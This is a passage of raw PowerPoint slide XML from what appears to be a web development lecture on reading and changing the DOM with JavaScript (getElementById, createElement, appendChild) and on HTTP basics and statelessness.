          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87A8B02-F09C-DA4F-B6E9-802D70DE8F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98332" y="2506226"/>
            <a:ext cx="6673850" cy="1874007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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('t1').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nodeName</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('t1').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nodeValue</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('t1').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firstChild.nodeName</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('t1').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firstChild.firstChild.nodeName</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>('t1').</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0" err="1">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firstChild.firstChild.nodeValue</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRP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3B8D4A68-7852-5A4E-BCB4-635B09D991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91913" y="889899"/>
            <a:ext cx="1883231" cy="104956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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id="t1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; Item 1 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40966" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A499C93F-C377-4F4A-9A2C-31441CF1F0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19340" y="548267"/>
            <a:ext cx="2235200" cy="341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 type="none" w="lg" len="med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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sample HTML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AFE845C-0B0C-EE46-958D-E4F7D9FE30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7638140" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reading DOM with JavaScript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87E26D-5F32-A84E-ADFD-0EE8460FFD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7942350" y="2604200"/>
            <a:ext cx="3754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ul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3D1E1E3-28F1-494E-9BF8-89F848DCF986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7947791" y="2950793"/>
            <a:ext cx="5661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null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D7E3A2-E461-4546-96B1-A794CC1A07F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7962305" y="3297386"/>
            <a:ext cx="2904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li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161B257-1632-2941-857D-E1D09A4E4834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7962305" y="3643979"/>
            <a:ext cx="5757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text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24E3025-592B-1A45-91F8-D5D2C01259AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7967745" y="3990573"/>
            <a:ext cx="8915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 Item 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635B449-0779-B244-853B-B4C244F6A205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8230881" y="3178817"/>
            <a:ext cx="338019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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A text node below the "li" which holds the actual text data as its value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F9C646A-2B61-F240-A043-0165A272F88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8550257" y="3568474"/>
            <a:ext cx="579600" cy="230400"/>
            <a:chOff x="8550257" y="3568474"/>
            <a:chExt cx="579600" cy="230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487DDB7B-9705-EE48-B3F9-A571E31A8DF3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8550257" y="3568474"/>
                <a:ext cx="579600" cy="2077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487DDB7B-9705-EE48-B3F9-A571E31A8DF3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8541257" y="3559834"/>
                  <a:ext cx="59724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30083912-DDEE-5249-B0F4-956F6D1B4D86}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8575097" y="3786994"/>
                <a:ext cx="160920" cy="118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30083912-DDEE-5249-B0F4-956F6D1B4D86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566457" y="3777994"/>
                  <a:ext cx="178560" cy="29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1A5BD0AE-7878-3544-8F98-2B8DCA73C8FA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7786697" y="7515514"/>
              <a:ext cx="360" cy="3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1A5BD0AE-7878-3544-8F98-2B8DCA73C8F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777697" y="7506514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1286487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/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="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7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0E9C24B-F7FE-3242-AAF9-52DD85C3C5C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en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Some possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>elementName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>newChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>removeChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(node)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Example: add a new list item</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A86CA4EE-523B-454F-A5FD-1B20F6ACC7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28607" y="4234206"/>
            <a:ext cx="5581650" cy="19812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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> list = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('t1')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>newtext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>list.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>newitem.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>newtext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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80C2794-AC0B-124B-9120-1B2C360EFE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Manipulating DOM with JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3134807305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80AFDEC-EEDB-8845-9EDF-6EC67A1D7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Content Comes from Many Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC47573-D83D-442C-84A7-FE96326D4FF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28171965"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="2103120"/>
          <a:ext cx="7815943" cy="38894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1450117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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1608AF-69EE-024D-A1A5-AA31C08A210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HTTP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Transfer Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE56E2D8-72F6-9C48-B314-19E6D3E60BBC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en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used to request and return data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Methods: GET, POST, HEAD, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> request/response protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Each request is independent of previous requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Evolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTTP 1.0: simple </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTTP 1.1: more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTTP/2: derived from Google’s SPDY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Reduces and speeds up # of requests to render a page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3758B25-EB37-A24F-A5B5-D05EFC4F9087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6893910" y="1997331"/>
            <a:ext cx="395695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altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Statelessness has a significant impact on design and implementation of applications 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A57CD26-9E02-CC49-AFDA-254B0FF38BC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6025577" y="2437354"/>
            <a:ext cx="1202040" cy="637200"/>
            <a:chOff x="6025577" y="2437354"/>
            <a:chExt cx="1202040" cy="637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CA7B59AF-D3EE-4E41-8F93-C3A3FE61D330}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6025577" y="2437354"/>
                <a:ext cx="1202040" cy="57564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CA7B59AF-D3EE-4E41-8F93-C3A3FE61D330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007937" y="2419714"/>
                  <a:ext cx="1237680" cy="61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1C55CD0F-0BF2-2747-BC22-58399BF3A691}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6088577" y="2979874"/>
